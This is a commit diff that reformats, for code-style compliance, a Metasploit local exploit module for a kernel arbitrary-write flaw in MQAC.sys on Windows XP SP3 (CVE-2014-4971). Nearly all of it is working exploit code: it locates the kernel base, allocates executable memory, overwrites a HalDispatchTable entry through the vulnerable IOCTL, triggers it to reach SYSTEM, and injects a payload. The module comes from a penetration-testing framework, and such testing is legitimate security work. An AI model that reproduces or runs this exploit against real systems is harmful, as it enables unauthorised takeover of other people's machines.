Merge rubocop changes from Kernelsmith

Author: OJ

modules/exploits/windows/local/mqac_write.rb

@@ -14,62 +14,70 @@ class Metasploit3 < Msf::Exploit::Local
 
   INVALID_HANDLE_VALUE = 0xFFFFFFFF
 
-  def initialize(info={})
-    super(update_info(info, {
+  def initialize(info = {})
+    super(update_info(info,
       'Name'           => 'MQAC.sys Arbitrary Write Privilege Escalation',
-      'Description'    => %q{
+      'Description'    => %q(
         A vulnerability within the MQAC.sys module allows an attacker to
         overwrite an arbitrary location in kernel memory.
 
         This module will elevate itself to SYSTEM, then inject the payload
         into another SYSTEM process.
-      },
+      ),
       'License'       => MSF_LICENSE,
       'Author'        =>
         [
           'Matt Bergin', # original exploit and all the hard work
           'Spencer McIntyre' # MSF module
         ],
-      'Arch'           => [ ARCH_X86 ],
-      'Platform'       => [ 'win' ],
-      'SessionTypes'   => [ 'meterpreter' ],
+      'Arch'           => [ARCH_X86],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter'],
       'DefaultOptions' =>
         {
-          'EXITFUNC'   => 'thread',
+          'EXITFUNC'   => 'thread'
         },
       'Targets'        =>
         [
-          [ 'Windows XP SP3',
-            {
-              '_KPROCESS' => "\x44",
-              '_TOKEN' => "\xc8",
-              '_UPID' => "\x84",
-              '_APLINKS' => "\x88"
-            }
-          ],
+          ['Windows XP SP3',
+           {
+             '_KPROCESS'  => "\x44",
+             '_TOKEN'     => "\xc8",
+             '_UPID'      => "\x84",
+             '_APLINKS'   => "\x88"
+           }
+          ]
         ],
-      'References'    =>
+      'References'     =>
         [
-          [ 'CVE', '2014-4971' ],
-          [ 'EDB', '34112' ],
-          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]
+          %w(CVE 2014-4971),
+          %w(EDB 34112),
+          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
         ],
-      'DisclosureDate'=> 'Jul 22 2014',
-      'DefaultTarget' => 0
-    }))
+      'DisclosureDate' => 'Jul 22 2014',
+      'DefaultTarget'  => 0
+    ))
   end
 
   def find_sys_base(drvname)
-    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ['PBLOB', 'lpImageBase', 'out'], ['DWORD', 'cb', 'in'], ['PDWORD', 'lpcbNeeded', 'out']])
-    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ['LPVOID', 'ImageBase', 'in'], ['PBLOB', 'lpBaseName', 'out'], ['DWORD', 'nSize', 'in']])
+    session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
+    lp_image_base = %w(PBLOB lpImageBase out)
+    cb = %w(DWORD cb in)
+    lpcb_needed = %w(PDWORD lpcbNeeded out)
+    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL',
+                                 [lp_image_base, cb, lpcb_needed])
+    image_base = %w(LPVOID ImageBase in)
+    lp_base_name = %w(PBLOB lpBaseName out)
+    n_size = %w(DWORD nSize in)
+    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD',
+                                 [image_base, lp_base_name, n_size])
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
     addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('L*')
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
       current_drvname = results['lpBaseName'][0..results['return'] - 1]
-      if drvname == nil
+      if drvname.nil?
         if current_drvname.downcase.include?('krnl')
           return [address, current_drvname]
         end
@@ -99,12 +107,14 @@ def get_system_proc
   end
 
   def open_device
-    handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
-    if handle['return'] == 0
+    handle = session.railgun.kernel32.CreateFileA('\\\\.\\MQAC',
+      'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
+    handle = handle['return']
+    if handle == 0
       print_error('Failed to open the \\\\.\\MQAC device')
       return nil
     end
-    handle = handle['return']
+    handle
   end
 
   def check
@@ -141,8 +151,8 @@ def exploit
       return
     end
 
-    # Running on Windows XP versions that aren't listed in the supported list results
-    # in a BSOD and so we should not let that happen.
+    # Running on Windows XP versions that aren't listed in the supported list
+    # results in a BSOD and so we should not let that happen.
     return unless check == Exploit::CheckCode::Appears
 
     kernel_info = find_sys_base(nil)
@@ -154,7 +164,10 @@ def exploit
 
     this_proc = session.sys.process.open
     unless this_proc.memory.writable?(base_addr)
-      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack('L'), nil, [ 0xffff ].pack('L'), 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('L'), nil,
+                                                    [0xffff].pack('L'),
+                                                    'MEM_COMMIT|MEM_RESERVE',
+                                                    'PAGE_EXECUTE_READWRITE')
     end
     unless this_proc.memory.writable?(base_addr)
       print_error('Failed to properly allocate memory')
@@ -164,7 +177,8 @@ def exploit
 
     hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
     hKernel = hKernel['return']
-    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
+    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel,
+                                                              'HalDispatchTable')
     halDispatchTable = halDispatchTable['return']
     halDispatchTable -= hKernel
     halDispatchTable += kernel_info[0]
@@ -193,8 +207,10 @@ def exploit
     this_proc.close
 
     print_status('Triggering vulnerable IOCTL')
-    session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
-    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
+    session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,
+                                                1, 0x258,
+                                                halDispatchTable + 0x4, 0)
+    session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
 
     unless is_system?
       print_error('Exploit failed')
@@ -207,5 +223,4 @@ def exploit
       fail_with(Failure::Unknown, 'Error while executing the payload')
     end
   end
-
 end